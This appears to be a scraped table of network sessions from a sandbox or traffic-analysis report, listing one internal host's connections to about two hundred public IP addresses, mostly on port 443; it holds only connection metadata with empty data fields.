                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23212192.168.2.133964086.6.192.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23213192.168.2.1355346193.245.213.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23214192.168.2.1350306217.130.47.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23215192.168.2.135066838.38.112.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23216192.168.2.1353486124.175.2.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23217192.168.2.1349088132.65.180.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23218192.168.2.1339326200.219.143.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23219192.168.2.1340670202.2.36.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23220192.168.2.135693434.187.246.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23221192.168.2.1360480146.201.87.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23222192.168.2.1339302141.66.232.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23223192.168.2.134762448.154.141.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23224192.168.2.133367035.148.181.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23225192.168.2.1339808132.191.206.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23226192.168.2.1337394151.145.83.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23227192.168.2.1339884148.126.38.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23228192.168.2.135017045.179.36.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23229192.168.2.13532024.226.71.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23230192.168.2.1359536102.206.121.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23231192.168.2.1353860113.200.80.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23232192.168.2.1344302184.108.33.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23233192.168.2.1344492112.161.106.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23234192.168.2.135114878.95.28.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23235192.168.2.1351536143.236.154.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23236192.168.2.1351280177.216.61.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23237192.168.2.136021461.187.108.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23238192.168.2.1355204218.201.109.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23239192.168.2.1333750115.251.155.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23240192.168.2.1354548121.125.31.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23241192.168.2.1335100149.212.153.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23242192.168.2.134032837.97.27.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23243192.168.2.133882038.141.79.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23244192.168.2.135701245.199.97.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23245192.168.2.1341542216.101.255.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23246192.168.2.134467693.3.132.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23247192.168.2.1342596136.103.243.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23248192.168.2.134951487.23.188.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23249192.168.2.1345694183.252.49.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23250192.168.2.1333706119.1.87.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23251192.168.2.135060896.144.21.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23252192.168.2.1353444106.124.139.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23253192.168.2.13468669.50.112.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23254192.168.2.1348194145.197.138.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23255192.168.2.134959031.74.13.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23256192.168.2.136056288.35.240.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23257192.168.2.13355845.87.250.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23258192.168.2.1339622168.10.43.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23259192.168.2.1352340119.217.172.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23260192.168.2.134807236.26.115.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23261192.168.2.133896860.36.226.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23262192.168.2.135420018.161.188.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23263192.168.2.1349872207.125.232.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23264192.168.2.134416076.146.243.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23265192.168.2.133470632.191.146.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23266192.168.2.1347364168.61.103.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23267192.168.2.1343036194.234.63.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23268192.168.2.135075260.136.185.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23269192.168.2.1349970219.28.170.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23270192.168.2.134212882.136.213.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23271192.168.2.134045060.117.38.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23272192.168.2.1335140208.124.26.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23273192.168.2.1343318153.33.216.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23274192.168.2.1354334157.92.90.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23275192.168.2.1354628201.82.21.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23276192.168.2.1338010169.167.68.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23277192.168.2.1340958175.39.109.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23278192.168.2.1340088209.75.253.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23279192.168.2.13337968.74.211.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23280192.168.2.1349258144.97.110.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23281192.168.2.1348396130.219.29.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23282192.168.2.1360690206.109.98.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23283192.168.2.1353944211.249.87.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23284192.168.2.1360842165.212.202.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23285192.168.2.1356706125.100.122.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23286192.168.2.134407490.93.48.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23287192.168.2.1354320217.168.32.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23288192.168.2.135547271.56.99.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23289192.168.2.134060498.118.146.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23290192.168.2.1341474180.224.239.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23291192.168.2.1335714125.99.244.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23292192.168.2.1359072120.220.241.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23293192.168.2.1333552134.71.163.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23294192.168.2.1352230190.28.190.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23295192.168.2.1349382211.217.1.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23296192.168.2.1343350178.184.178.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23297192.168.2.1355618166.187.231.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23298192.168.2.134727073.118.152.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23299192.168.2.1344630158.112.57.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23300192.168.2.1340524147.204.212.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23301192.168.2.1334506153.234.97.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23302192.168.2.1343884173.78.20.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23303192.168.2.135266058.8.217.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23304192.168.2.1356852206.133.190.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23305192.168.2.1339954169.141.139.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23306192.168.2.134164895.205.223.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23307192.168.2.133991227.205.70.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23308192.168.2.13544725.132.236.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23309192.168.2.133559841.87.89.9637215
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23310192.168.2.1351088197.246.141.12737215
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23311192.168.2.1357292134.183.102.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23312192.168.2.135906096.181.82.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23313192.168.2.1345614149.20.46.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23314192.168.2.1335298101.17.217.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23315192.168.2.1344800115.186.42.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23316192.168.2.134157227.23.80.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23317192.168.2.1347868172.57.64.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23318192.168.2.1349142206.251.74.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23319192.168.2.1346276186.220.73.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23320192.168.2.133925236.64.82.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23321192.168.2.135345817.191.126.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23322192.168.2.133474288.67.63.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23323192.168.2.134626244.25.117.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23324192.168.2.135585242.83.149.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23325192.168.2.133351420.109.241.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23326192.168.2.1356730111.20.102.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23327192.168.2.1339482212.32.99.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23328192.168.2.1359860173.36.108.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23329192.168.2.1360012129.62.194.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23330192.168.2.134882653.49.17.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23331192.168.2.133859648.48.22.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23332192.168.2.1348092116.202.200.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23333192.168.2.1350304143.10.134.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23334192.168.2.1343602146.24.163.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23335192.168.2.1359980174.54.72.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23336192.168.2.1350322135.167.26.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23337192.168.2.133435648.127.120.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23338192.168.2.1359934173.184.144.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23339192.168.2.135020647.98.182.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23340192.168.2.1342014169.182.245.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23341192.168.2.135164296.138.74.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23342192.168.2.134479634.39.251.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23343192.168.2.134557497.125.48.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23344192.168.2.1352990220.37.202.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23345192.168.2.13547581.22.29.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23346192.168.2.133459288.164.214.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23347192.168.2.1344864118.162.42.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23348192.168.2.1344756189.238.41.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23349192.168.2.1334008211.122.224.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23350192.168.2.135211034.30.71.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23351192.168.2.13402144.117.191.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23352192.168.2.136028490.239.16.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23353192.168.2.134210277.37.192.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23354192.168.2.1357176105.190.60.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23355192.168.2.1335500109.134.213.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23356192.168.2.135548086.164.129.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23357192.168.2.1356064120.189.203.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23358192.168.2.1357484175.76.88.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23359192.168.2.1348902175.211.215.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23360192.168.2.13573184.71.23.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23361192.168.2.1343584193.107.224.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23362192.168.2.1337006218.255.159.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23363192.168.2.1345420144.36.53.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23364192.168.2.134670850.60.234.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23365192.168.2.1347282169.141.76.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23366192.168.2.135627497.254.196.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23367192.168.2.1360682143.28.90.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23368192.168.2.1359954181.1.86.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23369192.168.2.134017099.41.20.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23370192.168.2.133914243.112.23.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23371192.168.2.135974023.217.208.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23372192.168.2.133491623.111.9.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23373192.168.2.135816076.241.176.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23374192.168.2.1340824191.74.23.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23375192.168.2.1334586198.127.91.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23376192.168.2.135467271.167.201.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23377192.168.2.135175264.231.60.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23378192.168.2.1354300155.7.223.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23379192.168.2.1333394103.66.143.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23380192.168.2.133870649.187.78.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23381192.168.2.1343612110.135.122.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23382192.168.2.1343234113.208.48.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23383192.168.2.1351668142.182.144.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23384192.168.2.134373250.42.15.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23385192.168.2.1351202171.46.155.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23386192.168.2.1359410153.230.35.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23387192.168.2.135637098.134.41.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23388192.168.2.1352660139.48.177.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23389192.168.2.13505725.85.8.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23390192.168.2.1339936189.200.32.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23391192.168.2.1335370119.235.187.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23392192.168.2.135087859.70.16.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23393192.168.2.133480075.103.128.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23394192.168.2.1336656206.50.136.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23395192.168.2.134148853.230.123.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23396192.168.2.134255649.219.245.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23397192.168.2.135697836.193.110.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23398192.168.2.1343228157.139.46.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23399192.168.2.1333512186.107.40.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23400192.168.2.1346640192.39.100.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23401192.168.2.135979859.63.65.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23402192.168.2.134777899.173.248.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23403192.168.2.134483688.185.19.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23404192.168.2.1353270156.208.179.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23405192.168.2.1354768184.14.126.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23406192.168.2.13487925.99.58.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23407192.168.2.1344352194.21.204.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23408192.168.2.135253259.84.95.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23409192.168.2.135026075.73.241.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23410192.168.2.1348394221.35.96.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23411192.168.2.1336332206.203.235.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23412192.168.2.1359496209.128.226.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23413192.168.2.1359734107.54.216.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23414192.168.2.133405846.80.16.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23415192.168.2.134927674.90.96.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23416192.168.2.1334174118.242.155.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23417192.168.2.1357222101.219.210.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23418192.168.2.1346736133.45.237.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23419192.168.2.134191054.186.236.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23420192.168.2.135966235.197.216.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23421192.168.2.1348898104.156.105.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23422192.168.2.134885470.22.187.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23423192.168.2.1352868142.115.90.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23424192.168.2.135863465.138.66.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23425192.168.2.133380664.150.210.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23426192.168.2.13544341.213.80.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23427192.168.2.133845642.141.180.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23428192.168.2.1340138212.243.207.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23429192.168.2.1360370155.241.68.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23430192.168.2.1333204110.215.208.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23431192.168.2.135883473.42.235.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23432192.168.2.133807649.58.195.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
